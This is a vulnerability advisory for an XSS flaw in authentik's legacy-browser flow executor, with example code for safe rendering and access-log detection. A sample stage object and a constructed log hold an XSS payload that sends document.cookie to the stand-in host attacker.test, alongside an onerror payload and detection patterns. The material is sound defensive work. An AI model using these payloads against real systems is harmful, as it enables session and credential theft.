
CVE-2026-42849: authentik Identity Provider XSS Vulnerability

CVE-2026-42849 is a cross-site scripting flaw in the authentik open-source identity provider, affecting the AutosubmitStage of its Simple Flow Executor. This post covers the technical details, affected versions, security impact, and mitigation steps.


CVE-2026-42849 Overview

CVE-2026-42849 is a Cross-Site Scripting (XSS) vulnerability in authentik, an open-source identity provider. The flaw resides in the AutosubmitStage component of the Simple Flow Executor (SFE), a subsystem designed to keep authentication flows working in legacy browsers. An attacker can get script content into the page rendered for that stage, and it executes in the victim's browser within the authentik origin. The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and affects authentik releases prior to 2025.12.5 on the 2025.x branch and prior to 2026.2.3 on the 2026.x branch. Maintainers patched the issue in those two versions.

Critical Impact

Successful exploitation enables script execution in the context of an authenticated authentik session. Because the script runs in the identity provider's origin, it can read session tokens, capture credentials entered into the flow, and reach every downstream single sign-on integration that trusts authentik.

Affected Products

  • authentik versions prior to 2025.12.5 (2025.x branch)
  • authentik versions prior to 2026.2.3 (2026.x branch)
  • Deployments using the Simple Flow Executor (SFE) with AutosubmitStage

Discovery Timeline

  • 2026-06-02 - CVE-2026-42849 published to NVD
  • 2026-06-02 - Last updated in NVD database

Technical Details for CVE-2026-42849

Vulnerability Analysis

The vulnerability is a Cross-Site Scripting (XSS) flaw in the AutosubmitStage of authentik's Simple Flow Executor (SFE). The SFE renders authentication flow stages as simplified HTML so that legacy browsers which cannot run the modern JavaScript-based flow executor can still complete a flow. To keep that path simple, the AutosubmitStage emits its form fields and submission logic without the output encoding controls the primary executor applies.

Attackers can supply input that is reflected unescaped into the SFE-rendered page. When the victim's browser parses the page, the injected payload executes inside the authentik origin. Because authentik is an identity provider, an attacker-controlled script can exfiltrate session tokens, intercept SAML or OAuth responses, and pivot into federated applications.

Root Cause

The root cause is improper neutralization of input during web page generation in the AutosubmitStage rendering path of the SFE. Stage parameters intended to populate an auto-submitting form are interpolated into HTML without encoding appropriate to the context they land in (element text, attribute value, or URL). The SFE favoured straightforward legacy browser rendering over the strict templating used by the standard flow executor, and so lacked the escaping that would normally neutralize a script payload.
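To make the CWE-79 pattern concrete, here is an added example written for this write-up; it is not authentik's SFE source. It models an auto-submitting form renderer in two variants: one that interpolates stage parameters raw into HTML, and one that encodes every parameter for its context and validates the form action's URL scheme. The stage shape ({url, attrs}) and the SAML field names are assumptions chosen for illustration.

```javascript
// Added example, not authentik code. Stage shape and field names are assumptions.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Entity-encode every HTML metacharacter (safe for text and quoted-attribute contexts).
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Only http(s) form actions are acceptable; a javascript: action would run on submit,
// and entity-encoding alone does not stop that.
function assertHttpUrl(url) {
  const parsed = new URL(url); // throws on malformed input
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") {
    throw new Error(`refusing non-http form action: ${parsed.protocol}`);
  }
  return parsed.href;
}

// Constant submission logic: it contains no attacker-influenced data.
const SUBMIT_SCRIPT = '<script>document.getElementById("autosubmit").submit();</script>';

// Vulnerable renderer: raw string interpolation of stage parameters (the CWE-79 pattern).
function renderAutosubmitUnsafe(stage) {
  const inputs = Object.entries(stage.attrs)
    .map(([name, value]) => `<input type="hidden" name="${name}" value="${value}">`)
    .join("");
  return `<form id="autosubmit" method="POST" action="${stage.url}">${inputs}</form>${SUBMIT_SCRIPT}`;
}

// Hardened renderer: every parameter is encoded for the attribute context it lands in,
// and the action URL is validated before use.
function renderAutosubmitSafe(stage) {
  const action = escapeHtml(assertHttpUrl(stage.url));
  const inputs = Object.entries(stage.attrs)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("");
  return `<form id="autosubmit" method="POST" action="${action}">${inputs}</form>${SUBMIT_SCRIPT}`;
}

// Oracle: does the raw payload survive into the rendered markup?
function payloadReachesMarkup(html, payload) {
  return html.includes(payload);
}

// True if the hardened renderer refuses the stage (e.g. a javascript: action).
function safeRendererRejects(stage) {
  try { renderAutosubmitSafe(stage); return false; } catch (_) { return true; }
}

// Constructed stage: a SAML POST binding whose RelayState carries an XSS payload.
const SAMPLE_STAGE = {
  url: "https://sp.example.test/saml/acs",
  attrs: {
    SAMLResponse: "PHNhbWxwOlJlc3BvbnNlPi4uLjwvc2FtbHA6UmVzcG9uc2U+",
    RelayState: '"><script>fetch("https://attacker.test/?c="+document.cookie)</script>',
  },
};
```

With SAMPLE_STAGE, the unsafe renderer emits the RelayState payload verbatim, closing the value attribute and opening a live script element; the hardened renderer emits it as `&quot;&gt;&lt;script&gt;...`, which the browser treats as inert attribute text. Note that SUBMIT_SCRIPT is still an inline script: under the strict Content Security Policy suggested as a workaround below, it would need a nonce or an external script file, which is a separate concern from the encoding fix.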

Attack Vector

Exploitation requires network access to the authentik instance and user interaction, typically by enticing a victim to follow a crafted flow URL. The attacker constructs a request that routes through the SFE and reaches the vulnerable AutosubmitStage with attacker-controlled values. When the victim's browser loads the stage, the injected JavaScript executes under the authentik origin. In CVSS terms the scope is changed, because the attacker can read or modify data in downstream applications that trust authentik for authentication. See the GitHub Security Advisory GHSA-pgff-5mx8-fqj3 for vendor technical details.

Detection Methods for CVE-2026-42849

Indicators of Compromise

  • Unexpected <script> tags, on* event handlers, or javascript: URIs appearing in HTTP responses from /if/flow/ or SFE endpoints serving AutosubmitStage.
  • Outbound requests from authenticated user browsers to unfamiliar domains immediately after a flow execution.
  • authentik event log entries showing flow executions that terminate at AutosubmitStage with abnormal parameter values.

Detection Strategies

  • Inspect authentik reverse proxy or ingress logs for flow URLs containing HTML metacharacters such as <, >, ", or encoded equivalents in query strings and form parameters.
  • Deploy a web application firewall rule that matches XSS payload patterns targeting authentik flow endpoints, including the /if/flow/ and SFE paths.
  • Correlate identity provider session creation events with unexpected token usage from new IP addresses or user agents shortly after flow completion.
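The first two strategies above can be automated. The following is an added example for this write-up, not authentik's code or tooling: it parses nginx "combined"-style access-log lines, keeps only requests to flow endpoints, URL-decodes the request target repeatedly to defeat double encoding, and flags HTML metacharacters, event handlers, javascript: URIs and script tags. The /if/flow/ prefix is the one named in this write-up; other SFE paths are deployment-specific and are not assumed. The log lines are constructed, not captured from a real system.

```javascript
// Added detection example, not authentik code. Log lines below are constructed.

const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;
const FLOW_PATH = /^\/if\/flow\//;

// Decode until the string stops changing, so %253C (double-encoded '<') is caught.
function decodeFully(raw, maxRounds = 3) {
  let current = raw;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current.replace(/\+/g, " "));
    } catch (_) {
      return current; // malformed percent-escape: keep what we have so far
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns a short reason if the decoded request target looks like an XSS attempt, else null.
function classifyTarget(decoded) {
  if (/<\s*script/i.test(decoded)) return "script-tag";
  if (/javascript\s*:/i.test(decoded)) return "javascript-uri";
  if (/\bon[a-z]+\s*=/i.test(decoded)) return "event-handler";
  if (/[<>"]/.test(decoded)) return "html-metachar";
  return null;
}

// Scan a block of access-log text; return one finding per suspicious flow request.
function scanAccessLog(text) {
  const findings = [];
  for (const line of text.split("\n")) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;                    // not a parseable access-log record
    const [, ip, ts, method, target, status] = m;
    const path = target.split("?")[0];
    if (!FLOW_PATH.test(path)) continue; // only authentik flow endpoints are in scope
    const reason = classifyTarget(decodeFully(target));
    if (reason) findings.push({ ip, ts, method, status, target, reason });
  }
  return findings;
}

// Constructed sample log: one benign flow request, one encoded script payload,
// one double-encoded event-handler payload, one out-of-scope API request, one noise line.
const SAMPLE_LOG = [
  '203.0.113.10 - - [02/Jun/2026:10:00:01 +0000] "GET /if/flow/default-authentication-flow/?next=%2Fapplication%2Fo%2Fauthorize%2F HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.77 - - [02/Jun/2026:10:00:09 +0000] "GET /if/flow/legacy-login/?RelayState=%22%3E%3Cscript%3Efetch(%22https%3A%2F%2Fattacker.test%2F%3Fc%3D%22%2Bdocument.cookie)%3C%2Fscript%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (MSIE 11.0)"',
  '203.0.113.77 - - [02/Jun/2026:10:00:12 +0000] "GET /if/flow/legacy-login/?RelayState=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (MSIE 11.0)"',
  '198.51.100.5 - - [02/Jun/2026:10:01:00 +0000] "GET /api/v3/core/users/?search=%3Cadmin HTTP/1.1" 200 880 "-" "curl/8.5"',
  'garbage line that is not an access-log record',
].join("\n");
```

Running scanAccessLog(SAMPLE_LOG) yields two findings, both from 203.0.113.77: the first classified as script-tag, the second (only visible after two decoding rounds) as event-handler. The benign flow request and the out-of-scope API request are not reported. In a real pipeline, feed the findings to the SIEM correlation described in the third strategy above rather than alerting on them in isolation, since raw metacharacters in query strings also occur in legitimate traffic.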

Monitoring Recommendations

  • Enable verbose flow execution logging in authentik and forward events to a centralized SIEM for analysis against XSS payload signatures.
  • Monitor browser Content Security Policy (CSP) violation reports if CSP is enforced on the authentik frontend.
  • Alert on administrative or high-privilege accounts completing flows that route through the SFE rather than the standard executor.

How to Mitigate CVE-2026-42849

Immediate Actions Required

  • Upgrade authentik to version 2025.12.5 if running the 2025.x branch, or to 2026.2.3 if running the 2026.x branch.
  • Audit existing sessions and revoke any tokens issued during the exposure window once patched.
  • Rotate any administrator credentials and signing keys that may have been accessible to a compromised browser session.

Patch Information

The authentik maintainers released fixed builds in versions 2025.12.5 and 2026.2.3. Both releases correct the output encoding within the AutosubmitStage of the Simple Flow Executor. Refer to the authentik GitHub Security Advisory for the official fix commit and release notes.

Workarounds

  • Disable the Simple Flow Executor where legacy browser support is not required, forcing all clients to use the standard flow executor.
  • Restrict access to authentik flow endpoints to trusted networks until the patched version is deployed.
  • Enforce a strict Content Security Policy that disallows inline scripts on the authentik origin to limit the impact of injected payloads. Test the policy in report-only mode first and confirm that both the standard executor and the SFE still complete flows before enforcing it.
Example upgrade commands for the two common deployment methods:

```bash
# Upgrade authentik via Helm (example; use --version 2025.12.5 on the 2025.x branch)
helm repo update
helm upgrade authentik authentik/authentik \
  --namespace authentik \
  --version 2026.2.3

# Or pin the Docker image tag in docker-compose.yml, then pull and recreate:
# image: ghcr.io/goauthentik/server:2026.2.3
docker compose pull
docker compose up -d
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
